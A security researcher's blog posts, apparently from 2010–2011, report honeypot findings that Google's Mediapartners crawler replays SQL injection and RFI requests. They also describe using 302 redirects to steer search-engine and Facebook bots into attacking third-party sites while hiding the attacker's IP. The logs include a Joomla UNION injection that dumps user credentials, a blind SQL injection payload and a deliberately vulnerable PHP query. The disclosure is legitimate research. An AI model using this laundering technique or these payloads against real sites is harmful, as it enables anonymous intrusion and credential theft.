Posts tagged Mediapartners

Bots Command & Conquer

Some months ago, I was interested by suspicious alerts, generated on our Honey Net, how are related to the dedicated Google AdSense “Mediapartners-Google*” bot.
Mediapartners bot, as I understand, is working with the Google cache, so, when a new web page, or an existing web page, using the AdSense javascript code, is called by a visitor, and is no not contained in the Google cache, the Mediapartners bot will fetch the web page.

If the web page how has been invoked, first by the visitor, contain SQL injection, RFI, LFI or XSS URL parameters, Mediapartners bot will replay the attack. So if you are vulnerable to theses web attacks, you will get owned first by the visitor how has invoke the vulnerable URL, then by Mediapartners bot how will copycat the visitor action. I tested with SQL injections and RFI vulnerabilities, my lab was all the time owned, in a second time, by the Mediapartners bot.

This bot behavior, is interesting, cause you could need a web attack how require two sequences, the first sequence will be made by the visitor call, then the second action by the bot. For example, on a RFI vulnerability (, the visitor first call, will execute the “id.txt” code, and directly after the code execution the original id.txt code could be automatically replaced by a different code, how will be then called by the Mediapartners copycat bot.

Mediapartners bot is not a “classical” search engine bot. “Classical” search engine bot will visit your website depending the popularity of your website, and surely others criteria, so you don’t have any control on when they will come visit you. In 2001, lcamtuf (aka Michal Zalewski) has publish a Phrack “Rise of the Robots” article how demonstrate that classical search engine, with them natural “link follow” behavior, could also participate to hack vulnerable websites. Just create a web page with thousands of SQL injections, or RFI, web links, the search engine bot will follow the links and execute the web attacks. This technique is known as “link spam“. But as described by lcamtuf you don’t have the control on the bot visit timeline.

With the Mediapartners bot, we have the control on the timing, cause you know the triggers how are calling the bot. You need to have a valid AdSense account, the AdSense javascript in your web page, and the web page shouldn’t not be in the Google cache. Quiet easy to on demand invoke the bot, create random web pages, with all the pre-requirements and the job will be done. Bot invocation on demand.

But you still have a trouble, you have to reveal your source IP, by the first web page invocation, the attack is not transparent.

“Classical” search engine bots have interesting features, for example the could react the 301 or 302 HTTP redirection. So you could redirect, certain bots, where you want. Just take a look at the following code, and replace “Bots“, with a bot fingerprint :

I have test the 302 redirection with the most common search engine bots, and have see that most of them are “vulnerable”.

  • msnbot-media

C&C server – – [14/Jan/2011:21:56:38 +0100] “GET /random_url.php HTTP/1.1” 302 236957 “-” “msnbot-media/1.1 (+”

Target server – – [14/Jan/2011:21:56:40 +0100] “GET /robots.txt HTTP/1.1” 200 74 “-” “msnbot-media/1.1 (+” – – [14/Jan/2011:21:56:41 +0100] “GET / HTTP/1.1” 200 15146 “-” “msnbot-media/1.1 (+”

  • bingbot

C&C server – – [14/Jan/2011:22:34:49 +0100] “GET /random_url.php HTTP/1.1” 302 19847 “-” “Mozilla/5.0 (compatible; bingbot/2.0; +”

Target server – – [14/Jan/2011:22:34:50 +0100] “GET /robots.txt HTTP/1.1” 200 74 “-” “Mozilla/5.0 (compatible; bingbot/2.0; +” – – [14/Jan/2011:22:34:51 +0100] “GET / HTTP/1.1” 200 15146 “-” “Mozilla/5.0 (compatible; bingbot/2.0; +”

  • Yahoo! Slurp – – [16/Jan/2011:09:08:55 +0100] “GET /random_url.php HTTP/1.0” 302 – “-” “Mozilla/5.0 (compatible; Yahoo! Slurp;”

  • Googlebot-Image – – [14/Jan/2011:22:09:02 +0100] “GET /random_url.php HTTP/1.1” 302 71861 “-” “Googlebot-Image/1.0”

All the time, the bots have execute the web attacks, and they was the only source IP of the attack, they’re is no need to directly to reveal yourself for web hacking, the search engine bots will do the job for you. But as I explained, you don’t have any control on the bot invocation.

After some searches I discovered that Mediapartners bot is also vulnerable to the 302 redirection. So you know how to call the bot, and you have control on him by redirecting him where you want.


Some random text

Here under the result. I still have to first invoke the bot, but then the bot will be redirected to the target URL, hiding my source IP.

C&C server – – [13/Jan/2011:00:27:40 +0100] “GET /random_URL.php HTTP/1.1” 200 1290 “-” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.231 Safari/534.10” – – [13/Jan/2011:00:27:42 +0100] “GET /random_URL.php HTTP/1.1” 302 1288 “-” “Mediapartners-Google”

Target server – – [13/Jan/2011:00:27:42 +0100] “GET / HTTP/1.1” 200 15146 “-” “Mediapartners-Google”

What is interesting to see is that the Mediapartners bot source IP on the C&C server is not the same than the source IP on the target server. The Mediapartners bots are sharing orders between different source servers.

I have now a fully controllable bot, time and target are customizable. It is quiet simple to create a C&C back-end how will generate random on demand web pages, and do the invocation of the bot. After more tests Mediapartners bot is not only supporting HTTP or HTTPS protocol, but also FTP. – – [15/Jan/2011:00:19:26 +0100] “GET /random_URL.php HTTP/1.1” 302 91754 “-” “Mediapartners-Google”

[email protected] ~]# tcpdump -n port 21
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

00:19:27.956865 IP > S 1218834134:1218834134(0) win 5840
00:19:27.956983 IP > S 2218131910:2218131910(0) ack 1218834135 win 5792
00:19:27.972538 IP > . ack 1 win 92
00:19:27.973972 IP > P 1:266(265) ack 1 win 91
00:19:27.989653 IP > . ack 266 win 108
00:19:27.989864 IP > P 1:17(16) ack 266 win 108
00:19:27.989894 IP > . ack 17 win 91
00:19:27.990238 IP > F 266:266(0) ack 17 win 91
00:19:28.005937 IP > F 17:17(0) ack 267 win 108
00:19:28.005975 IP > . ack 18 win 91

Is Mediapartners bot the only bot how is fully controllable ? No 🙂 Another example is the Facebook “facebookexternalhit” bot. Here under the description of the bot :

“Facebook allows its users to send links to interesting web content to other Facebook users. Part of how this works on the Facebook system involves the temporary display of certain images or details related to the web content, such as the title of the webpage or the embed tag of a video. Our system retrieves this information only after a user provides us with a link.”

When you publish an URL on your Facebook wall status, “facebookexternalhit” bot will fetch the URL and cache the content for later delivery. So, you have control on the bot invocation. Facebook has some security mechanisms how don’t permit you to publish a link on your wall containing SQL injection, RFI, LFI or XSS in parameters.

But “facebookexternalhit” bot is also vulnerable to 302 redirection, so permitting you to trick the security mechanism.

C&C server – – [14/Jan/2011:22:40:57 +0100] “GET /random_URL.php HTTP/1.1” 302 65629 “-” “facebookexternalhit/1.1 (+”

Target server – – [14/Jan/2011:22:40:58 +0100] “GET / HTTP/1.1” 200 9545 “-” “facebookexternalhit/1.1 (+”

Just publish a “normal” link on you Facebook status, the bot will fetch the page and will be directly redirected, for example, on a SQL injection URL. What is funny, is that the result of the web attack will be displayed on your wall 🙂

Result of a 302 SQL injection in the title HTML tag

Result of a LFI web attack on a targeted server after 302 redirection

A lot of bots are vulnerable to different attack, you never see them, but take care of them. I would like to thanks jduck from Metasploit Team, providing me some useful informations.

Google Mediapartners crawlers replaying web attacks

In the use case analysis SUC001, we have discovered that Google Mediapartners crawlers seems to replay web attacks under certain conditions :

  • Your website need to be a member of the AdSense network.
  • Your robots.txt file should not exclude the indexing of the “Mediapartners-Google”.
  • Your website targeted web page should contain a AdSense banner.
  • The “Mediapartners-Google” crawler should come frequently visit your website, better each time per web page display.

I have create a fake MySQL database named “injection“, you can find here under the fake content of this database.

  `id` int(11) NOT NULL auto_increment,
  `password` varchar(255) NOT NULL,
  PRIMARY KEY  (`id`)

INSERT INTO `injection` (`id`, `password`) VALUES
(1, 'testtest'),
(2, 'testtesttest');

I grant the MySQL user “injection” only to SELECT on the “injection” table and this locale.

After the creation of all SQL requirements, we need to create a PHP test page with a “id” parameter how is vulnerable to an SQL Injection attack, for example “test2.php?id=2“.

$sql = "SELECT password FROM injection WHERE id=" . $_REQUEST['id'];

We also insert into this web page some good keywords (just copy and past your favorite web article), and the required AdSense banner. Now every thing is configured, we can play to see if the Google Mediapartners crawlers will replay the SQL Injection attack.

The SQL Injection how will be played is the following :

SELECT password FROM injection WHERE id=2 AND ORD(MID((SELECT 4 FROM information_schema.TABLES LIMIT 0, 1), 70, 1)) > 51 AND 4454=4454

The web query result into the apache log file is returning this entry : - - [20/Apr/2010:22:48:45 +0200] "GET //test2.php?id=2%20AND%20ORD%28MID%28%28SELECT%204%20FROM%20information_schema.TABLES%20LIMIT%200%2C%201%29%2C%2070%2C%201%29%29%20%3E%2051%20AND%204454=4454 HTTP/1.1" 200 1280 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; fr-fr) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"

The MySQL log file is returning this entry :

100420 22:48:45
419 Connect     [email protected] on
1419 Init DB     injection
1419 Query       SELECT password FROM injection WHERE id=2 AND ORD(MID((SELECT 4 FROM information_schema.TABLES LIMIT 0, 1), 70, 1)) > 51 AND 4454=4454

This HTTP query is followed a few seconds later by the Google Mediapartners crawler. - - [20/Apr/2010:22:48:48 +0200] "GET //test2.php?id=2%20AND%20ORD(MID((SELECT%204%20FROM%20information_schema.TABLES%20LIMIT%200%2C%201)%2C%2070%2C%201))%20%3E%2051%20AND%204454=4454 HTTP/1.1" 200 1280 "-" "Mediapartners-Google"

And with no suprise we can see into the MySQL log file that the crawler is replaying the SQL Injection.

100420 22:48:48
1432 Connect     [email protected] on
1432 Init DB     injection
1432 Query       SELECT password FROM injection WHERE id=2 AND ORD(MID((SELECT 4 FROM information_schema.TABLES LIMIT 0, 1), 70, 1)) > 51 AND 4454=4454

So, in conclusion, if you website is a member of the Google AdSense network, displaying some AdSense banners, vulnerable and targeted by an SQL Injection, you will not be only owned by the bad guys, but also by Google 🙂

SUC001 : Google Mediapartners crawlers owned ? SQL injection + RFI detected

  • Use Case Reference : SUC001
  • Use Case Title : Google Mediapartners crawlers owned ? SQL injection + RFI detected
  • Use Case Detection : HTTP Logs / Database Logs / IDS
  • Targeted Attack : N/A
  • Identified tool(s) : Google Mediapartners crawler
  • Source IP(s) : Google –
  • Source Countries : N/A
  • Source Port(s) : Random
  • Destination Port(s) : 80 TCP

Today, same as every day, I have verify ZATAZ HoneyNet activities for the last 24 hours, and detect a SQL injection attempts on one of our servers. Actually looking a way to better attract the SQL Injection activities, I have look if one of my tactics has got some results. Analyzing the datas of the SQL injections attacks I was surprised about the result.

The source IP from this SQL injection attempt is Google, and more precisely one of the Google Mediapartners crawlers ( –, confirmed by the whois on the IP address.

Here under you can find the activity of this Google Mediapartner crawler on our HoneyNet.

Current week google crawler activities

The count of the 5 fingerprints for today are due to multiple pattern detection from the HoneyNet.

current month google crawler activities

For the current month, this is not the only time, that the Google crawler was detected as potential source of an attack.

Most of time, the crawler reporting a lot of IDS false positives. We have to go deeper in the investigation to act theses alerts as false negatives or not.

google crawler event details

The 133304 and 131291 CIDs are really false positives during indexing activities.

GET /news/8176/login.html HTTP/1.1
Connection: Keep-alive
Accept: */*
From: googlebot(at)
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +
Accept-Encoding: gzip,deflate
If-Modified-Since: Sun, 11 Apr 2010 07:58:58 GMT
All the 2010-04-19 18:24:45 GMT + 2 CIDs are only one fingerprint, how are really interesting to investigate.
2010-04-19 18:24:45
GET /alerte-securite//index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,email,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users-- HTTP/1.1
Connection: Keep-alive
Accept: */*
User-Agent: Mediapartners-Google
Accept-Encoding: gzip,deflate
As you can see there is an real SQL injection attempt. You can also see that the User-Agent differs from the false positives CIDs (Mediapartners-Google).
The CID 129140 is not related to an SQL injection attempt, but an RFI (Remote File Inclusion) attempt and the User-Agent is also Mediapartners-Google.
2010-04-09 07:06:59
GET /alerte-securite/20058/MassMirror-Uploader-GLOBALS%5BMM_ROOT_DIRECTORY%5D-upload_progress.php?GLOBALS%5BMM_ROOT_DIRECTORY%5D= HTTP/1.1
Connection: Keep-alive
Accept: */*
User-Agent: Mediapartners-Google
Accept-Encoding: gzip,deflate
Mediapartners Google User Agent is a dedicated crawler for Google AdSense, advertisements network. This robot analyze the page that display AdSense ads in order to target the ads to the page content. Normally site how do not show AdSense ads do not get visits of this crawler. The Google Mediapartners bot is using the same cache as the standard indexing bot (Googlebot).
If you only focus on theses CIDs you will not have a complete overview about the generation of theses alerts. You need to investigate the timeframe (+- 1 minutes) around this alerts.
A few seconds “2010-04-19 18:24:40” before the Google Mediapartners crawler has generate an alert, another alert was generated by “” IP address, how has the exactly same URL pattern.
2010-04-19 18:24:40

Source Address :

GET /alerte-securite//index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,email,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users-- HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.2) Gecko/20100115 Firefox/3.6 ()
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-9,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=ao791k1rtkmhqdhko9palil7r7; zatazsession_id=e356c332d8eba6d3bba2023c13cecc8a; __qca=P0-1134447578-1271694138756; __utma=163730740.1460337807.1271694138.1271694138.1271694138.1; __utmb=163730740.1.10.1271694138; __utmc=163730740; __utmz=163730740.1271694144.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|

We can see that after “” IP address has access a web page containing an AdSense ads, the Mediapartners Google bot has directly re index the same page, and replaying exactly the same query containing the SQL injection attempt.

It is clearly a false positive, Google is not targeting your website with SQL Injection, or RFI, attacks attempts. The bot is only replaying what previous attackers had attempt.

This point is interesting, cause if for example the SQL injection was successful, normally the content of your database will be displayed into the web page. A few seconds later, the Google Mediapartners bot will replay the same SQL injection query, and will he index the content of the database displayed into the web page ? After some deeper investigations it seems that yes.

Go to Top